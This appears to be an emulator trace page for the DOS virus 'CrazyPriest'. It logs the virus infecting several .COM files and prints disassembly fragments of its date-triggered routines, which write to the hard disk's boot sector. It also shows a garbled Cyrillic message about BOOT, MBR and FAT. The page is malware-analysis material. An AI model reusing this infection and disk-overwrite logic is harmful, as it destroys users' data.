Sample viewer

vx.netlux.org/Virus.DOS.CrazyPriest

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:45:21.356002008Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-17T22:45:21.359823668Z 37 PC: 132d7 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:45:21.361497365Z 26 PC: 132e1 | Set disk transfer address
2018-12-17T22:45:21.363191322Z 78 PC: 132ee | Find first file
2018-12-17T22:45:21.370558485Z 67 PC: 134c0 | Get or set file attributes
2018-12-17T22:45:21.377877645Z 67 PC: 134ce | Get or set file attributes
2018-12-17T22:45:21.395265629Z 61 PC: 134d3 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:45:21.402936775Z 42 PC: 135ab | Get date 0x135ab: cmp dh, 8
0x135ae: jne 0x135c4
0x135b0: cmp dl, 0xf
0x135b3: jne 0x135c4
0x135b5: mov dx, bp
0x135b7: add dx, 0x46f
0x135bb: mov ah, 9
0x135bd: int 0x21
0x135bf: mov ax, 0xe07
0x135c2: int 0x10
0x135c4: mov ah, 0x2c
0x135c6: int 0x21
0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
2018-12-17T22:45:21.40649185Z 44 PC: 135c8 | Get time 0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
0x135e1: jb 0x135e5
0x135e3: jmp 0x135d3
0x135e5: mov ax, 2
0x135e8: int 0x10
0x135ea: mov dx, bp
0x135ec: add dx, 0x41c
0x135f0: mov ah, 9
0x135f2: int 0x21
0x135f4: mov si, bp
0x135f6: add si, 0x5c7
0x135fa: mov al, byte ptr [si]
0x135fc: cmp al, 0
2018-12-17T22:45:21.409171385Z 63 PC: 134e5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:21.416038361Z 87 PC: 13504 | Get or set file date and time
2018-12-17T22:45:21.418579572Z 66 PC: 13516 | Move file pointer
2018-12-17T22:45:21.42073317Z 64 PC: 1353a | Write file or device (Write 1416 bytes on handle 5)
2018-12-17T22:45:21.431052527Z 66 PC: 13559 | Move file pointer
2018-12-17T22:45:21.440238608Z 64 PC: 13566 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:21.448352092Z 87 PC: 1356d | Get or set file date and time
2018-12-17T22:45:21.450560583Z 62 PC: 13571 | Close file
2018-12-17T22:45:21.460333832Z 67 PC: 13581 | Get or set file attributes
2018-12-17T22:45:21.471476356Z 79 PC: 1330b | Find next file
2018-12-17T22:45:21.475448744Z 79 PC: 1330b | Find next file
2018-12-17T22:45:21.479495662Z 67 PC: 134c0 | Get or set file attributes
2018-12-17T22:45:21.486272784Z 67 PC: 134ce | Get or set file attributes
2018-12-17T22:45:21.497729517Z 61 PC: 134d3 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:45:21.505422642Z 42 PC: 135ab | Get date 0x135ab: cmp dh, 8
0x135ae: jne 0x135c4
0x135b0: cmp dl, 0xf
0x135b3: jne 0x135c4
0x135b5: mov dx, bp
0x135b7: add dx, 0x46f
0x135bb: mov ah, 9
0x135bd: int 0x21
0x135bf: mov ax, 0xe07
0x135c2: int 0x10
0x135c4: mov ah, 0x2c
0x135c6: int 0x21
0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
2018-12-17T22:45:21.508358176Z 44 PC: 135c8 | Get time 0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
0x135e1: jb 0x135e5
0x135e3: jmp 0x135d3
0x135e5: mov ax, 2
0x135e8: int 0x10
0x135ea: mov dx, bp
0x135ec: add dx, 0x41c
0x135f0: mov ah, 9
0x135f2: int 0x21
0x135f4: mov si, bp
0x135f6: add si, 0x5c7
0x135fa: mov al, byte ptr [si]
0x135fc: cmp al, 0
2018-12-17T22:45:21.51078756Z 63 PC: 134e5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:21.51836578Z 87 PC: 13504 | Get or set file date and time
2018-12-17T22:45:21.520622765Z 66 PC: 13516 | Move file pointer
2018-12-17T22:45:21.522774035Z 64 PC: 1353a | Write file or device (Write 1416 bytes on handle 5)
2018-12-17T22:45:21.532670659Z 66 PC: 13559 | Move file pointer
2018-12-17T22:45:21.535001274Z 64 PC: 13566 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:21.544231638Z 87 PC: 1356d | Get or set file date and time
2018-12-17T22:45:21.546254494Z 62 PC: 13571 | Close file
2018-12-17T22:45:21.556566829Z 67 PC: 13581 | Get or set file attributes
2018-12-17T22:45:21.568064324Z 79 PC: 1330b | Find next file
2018-12-17T22:45:21.571919579Z 67 PC: 134c0 | Get or set file attributes
2018-12-17T22:45:21.578997137Z 67 PC: 134ce | Get or set file attributes
2018-12-17T22:45:21.591355729Z 61 PC: 134d3 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:45:21.599346022Z 42 PC: 135ab | Get date 0x135ab: cmp dh, 8
0x135ae: jne 0x135c4
0x135b0: cmp dl, 0xf
0x135b3: jne 0x135c4
0x135b5: mov dx, bp
0x135b7: add dx, 0x46f
0x135bb: mov ah, 9
0x135bd: int 0x21
0x135bf: mov ax, 0xe07
0x135c2: int 0x10
0x135c4: mov ah, 0x2c
0x135c6: int 0x21
0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
2018-12-17T22:45:21.602380853Z 44 PC: 135c8 | Get time 0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
0x135e1: jb 0x135e5
0x135e3: jmp 0x135d3
0x135e5: mov ax, 2
0x135e8: int 0x10
0x135ea: mov dx, bp
0x135ec: add dx, 0x41c
0x135f0: mov ah, 9
0x135f2: int 0x21
0x135f4: mov si, bp
0x135f6: add si, 0x5c7
0x135fa: mov al, byte ptr [si]
0x135fc: cmp al, 0
2018-12-17T22:45:21.605216049Z 63 PC: 134e5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:21.612628315Z 87 PC: 13504 | Get or set file date and time
2018-12-17T22:45:21.614352019Z 66 PC: 13516 | Move file pointer
2018-12-17T22:45:21.617011429Z 64 PC: 1353a | Write file or device (Write 1416 bytes on handle 5)
2018-12-17T22:45:21.627256706Z 66 PC: 13559 | Move file pointer
2018-12-17T22:45:21.629196571Z 64 PC: 13566 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:21.637530813Z 87 PC: 1356d | Get or set file date and time
2018-12-17T22:45:21.639189678Z 62 PC: 13571 | Close file
2018-12-17T22:45:21.64488331Z 67 PC: 13581 | Get or set file attributes
2018-12-17T22:45:21.652548677Z 79 PC: 1330b | Find next file
2018-12-17T22:45:21.654998601Z 67 PC: 134c0 | Get or set file attributes
2018-12-17T22:45:21.658822016Z 67 PC: 134ce | Get or set file attributes
2018-12-17T22:45:21.667763616Z 61 PC: 134d3 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:45:21.680368733Z 42 PC: 135ab | Get date 0x135ab: cmp dh, 8
0x135ae: jne 0x135c4
0x135b0: cmp dl, 0xf
0x135b3: jne 0x135c4
0x135b5: mov dx, bp
0x135b7: add dx, 0x46f
0x135bb: mov ah, 9
0x135bd: int 0x21
0x135bf: mov ax, 0xe07
0x135c2: int 0x10
0x135c4: mov ah, 0x2c
0x135c6: int 0x21
0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
2018-12-17T22:45:21.682770826Z 44 PC: 135c8 | Get time 0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
0x135e1: jb 0x135e5
0x135e3: jmp 0x135d3
0x135e5: mov ax, 2
0x135e8: int 0x10
0x135ea: mov dx, bp
0x135ec: add dx, 0x41c
0x135f0: mov ah, 9
0x135f2: int 0x21
0x135f4: mov si, bp
0x135f6: add si, 0x5c7
0x135fa: mov al, byte ptr [si]
0x135fc: cmp al, 0
2018-12-17T22:45:21.68595083Z 63 PC: 134e5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:21.693456082Z 87 PC: 13504 | Get or set file date and time
2018-12-17T22:45:21.694987776Z 66 PC: 13516 | Move file pointer
2018-12-17T22:45:21.69696528Z 64 PC: 1353a | Write file or device (Write 1416 bytes on handle 5)
2018-12-17T22:45:21.707013796Z 66 PC: 13559 | Move file pointer
2018-12-17T22:45:21.708671973Z 64 PC: 13566 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:21.715890453Z 87 PC: 1356d | Get or set file date and time
2018-12-17T22:45:21.718462169Z 62 PC: 13571 | Close file
2018-12-17T22:45:21.727290902Z 67 PC: 13581 | Get or set file attributes
2018-12-17T22:45:21.737979952Z 79 PC: 1330b | Find next file
2018-12-17T22:45:21.740730013Z 67 PC: 134c0 | Get or set file attributes
2018-12-17T22:45:21.745178304Z 67 PC: 134ce | Get or set file attributes
2018-12-17T22:45:21.751858738Z 61 PC: 134d3 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:45:21.757510195Z 42 PC: 135ab | Get date 0x135ab: cmp dh, 8
0x135ae: jne 0x135c4
0x135b0: cmp dl, 0xf
0x135b3: jne 0x135c4
0x135b5: mov dx, bp
0x135b7: add dx, 0x46f
0x135bb: mov ah, 9
0x135bd: int 0x21
0x135bf: mov ax, 0xe07
0x135c2: int 0x10
0x135c4: mov ah, 0x2c
0x135c6: int 0x21
0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
2018-12-17T22:45:21.759273793Z 44 PC: 135c8 | Get time 0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
0x135e1: jb 0x135e5
0x135e3: jmp 0x135d3
0x135e5: mov ax, 2
0x135e8: int 0x10
0x135ea: mov dx, bp
0x135ec: add dx, 0x41c
0x135f0: mov ah, 9
0x135f2: int 0x21
0x135f4: mov si, bp
0x135f6: add si, 0x5c7
0x135fa: mov al, byte ptr [si]
0x135fc: cmp al, 0
2018-12-17T22:45:21.761785756Z 63 PC: 134e5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:21.769865575Z 87 PC: 13504 | Get or set file date and time
2018-12-17T22:45:21.771716288Z 66 PC: 13516 | Move file pointer
2018-12-17T22:45:21.773772751Z 64 PC: 1353a | Write file or device (Write 1416 bytes on handle 5)
2018-12-17T22:45:21.784539499Z 66 PC: 13559 | Move file pointer
2018-12-17T22:45:21.786457998Z 64 PC: 13566 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:21.793731015Z 87 PC: 1356d | Get or set file date and time
2018-12-17T22:45:21.797454988Z 62 PC: 13571 | Close file
2018-12-17T22:45:21.806509833Z 67 PC: 13581 | Get or set file attributes
2018-12-17T22:45:21.817790726Z 79 PC: 1330b | Find next file
2018-12-17T22:45:21.821596806Z 67 PC: 134c0 | Get or set file attributes
2018-12-17T22:45:21.830024141Z 67 PC: 134ce | Get or set file attributes
2018-12-17T22:45:21.841178018Z 61 PC: 134d3 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:45:21.849553262Z 42 PC: 135ab | Get date 0x135ab: cmp dh, 8
0x135ae: jne 0x135c4
0x135b0: cmp dl, 0xf
0x135b3: jne 0x135c4
0x135b5: mov dx, bp
0x135b7: add dx, 0x46f
0x135bb: mov ah, 9
0x135bd: int 0x21
0x135bf: mov ax, 0xe07
0x135c2: int 0x10
0x135c4: mov ah, 0x2c
0x135c6: int 0x21
0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
2018-12-17T22:45:21.853299475Z 44 PC: 135c8 | Get time 0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
0x135e1: jb 0x135e5
0x135e3: jmp 0x135d3
0x135e5: mov ax, 2
0x135e8: int 0x10
0x135ea: mov dx, bp
0x135ec: add dx, 0x41c
0x135f0: mov ah, 9
0x135f2: int 0x21
0x135f4: mov si, bp
0x135f6: add si, 0x5c7
0x135fa: mov al, byte ptr [si]
0x135fc: cmp al, 0
2018-12-17T22:45:21.85617568Z 63 PC: 134e5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:21.863550252Z 87 PC: 13504 | Get or set file date and time
2018-12-17T22:45:21.866177476Z 66 PC: 13516 | Move file pointer
2018-12-17T22:45:21.867840426Z 64 PC: 1353a | Write file or device (Write 1416 bytes on handle 5)
2018-12-17T22:45:21.877742642Z 66 PC: 13559 | Move file pointer
2018-12-17T22:45:21.880446315Z 64 PC: 13566 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:21.887732727Z 87 PC: 1356d | Get or set file date and time
2018-12-17T22:45:21.889247451Z 62 PC: 13571 | Close file
2018-12-17T22:45:21.899175144Z 67 PC: 13581 | Get or set file attributes
2018-12-17T22:45:21.910173773Z 79 PC: 1330b | Find next file
2018-12-17T22:45:21.913720668Z 67 PC: 134c0 | Get or set file attributes
2018-12-17T22:45:21.919611807Z 67 PC: 134ce | Get or set file attributes
2018-12-17T22:45:21.930487914Z 61 PC: 134d3 | Open file (Filename = 'PAH.COM')
2018-12-17T22:45:21.937820395Z 42 PC: 135ab | Get date 0x135ab: cmp dh, 8
0x135ae: jne 0x135c4
0x135b0: cmp dl, 0xf
0x135b3: jne 0x135c4
0x135b5: mov dx, bp
0x135b7: add dx, 0x46f
0x135bb: mov ah, 9
0x135bd: int 0x21
0x135bf: mov ax, 0xe07
0x135c2: int 0x10
0x135c4: mov ah, 0x2c
0x135c6: int 0x21
0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
2018-12-17T22:45:21.940190716Z 44 PC: 135c8 | Get time 0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
0x135e1: jb 0x135e5
0x135e3: jmp 0x135d3
0x135e5: mov ax, 2
0x135e8: int 0x10
0x135ea: mov dx, bp
0x135ec: add dx, 0x41c
0x135f0: mov ah, 9
0x135f2: int 0x21
0x135f4: mov si, bp
0x135f6: add si, 0x5c7
0x135fa: mov al, byte ptr [si]
0x135fc: cmp al, 0
2018-12-17T22:45:21.943236169Z 63 PC: 134e5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:21.950769363Z 87 PC: 13504 | Get or set file date and time
2018-12-17T22:45:21.95231491Z 66 PC: 13516 | Move file pointer
2018-12-17T22:45:21.954768371Z 64 PC: 1353a | Write file or device (Write 1416 bytes on handle 5)
2018-12-17T22:45:21.964783343Z 66 PC: 13559 | Move file pointer
2018-12-17T22:45:21.966225289Z 64 PC: 13566 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:21.974163003Z 87 PC: 1356d | Get or set file date and time
2018-12-17T22:45:21.97578996Z 62 PC: 13571 | Close file
2018-12-17T22:45:21.984612597Z 67 PC: 13581 | Get or set file attributes
2018-12-17T22:45:21.996374287Z 79 PC: 1330b | Find next file
2018-12-17T22:45:21.99998919Z 67 PC: 134c0 | Get or set file attributes
2018-12-17T22:45:22.006002093Z 67 PC: 134ce | Get or set file attributes
2018-12-17T22:45:22.016777197Z 61 PC: 134d3 | Open file (Filename = 'TEST.COM')
2018-12-17T22:45:22.025204487Z 42 PC: 135ab | Get date 0x135ab: cmp dh, 8
0x135ae: jne 0x135c4
0x135b0: cmp dl, 0xf
0x135b3: jne 0x135c4
0x135b5: mov dx, bp
0x135b7: add dx, 0x46f
0x135bb: mov ah, 9
0x135bd: int 0x21
0x135bf: mov ax, 0xe07
0x135c2: int 0x10
0x135c4: mov ah, 0x2c
0x135c6: int 0x21
0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
2018-12-17T22:45:22.02790402Z 44 PC: 135c8 | Get time 0x135c8: cmp ch, 0x10
0x135cb: je 0x135d4
0x135cd: mov byte ptr ds:[bp + 0x588], 0
0x135d3: ret
0x135d4: cmp cl, 0
0x135d7: je 0x135db
0x135d9: jmp 0x135cd
0x135db: cmp byte ptr ds:[bp + 0x588], 3
0x135e1: jb 0x135e5
0x135e3: jmp 0x135d3
0x135e5: mov ax, 2
0x135e8: int 0x10
0x135ea: mov dx, bp
0x135ec: add dx, 0x41c
0x135f0: mov ah, 9
0x135f2: int 0x21
0x135f4: mov si, bp
0x135f6: add si, 0x5c7
0x135fa: mov al, byte ptr [si]
0x135fc: cmp al, 0
2018-12-17T22:45:22.030741394Z 63 PC: 134e5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:22.038823109Z 62 PC: 13571 | Close file
2018-12-17T22:45:22.040778772Z 67 PC: 13581 | Get or set file attributes
2018-12-17T22:45:22.052107052Z 79 PC: 1330b | Find next file

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:09.774440716Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:10.114816169Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:10.119734692Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:10.425973606Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:10.765351521Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:10.768357989Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:11.06399838Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:11.706797948Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:11.709508736Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:13.219472924Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:13.545678227Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:13.548432147Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:14.483060987Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:14.823862855Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:14.826634574Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:14.762541911Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:15.471240555Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:15.474480334Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:14.982259971Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:15.472184229Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:15.475042855Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:15.707208155Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
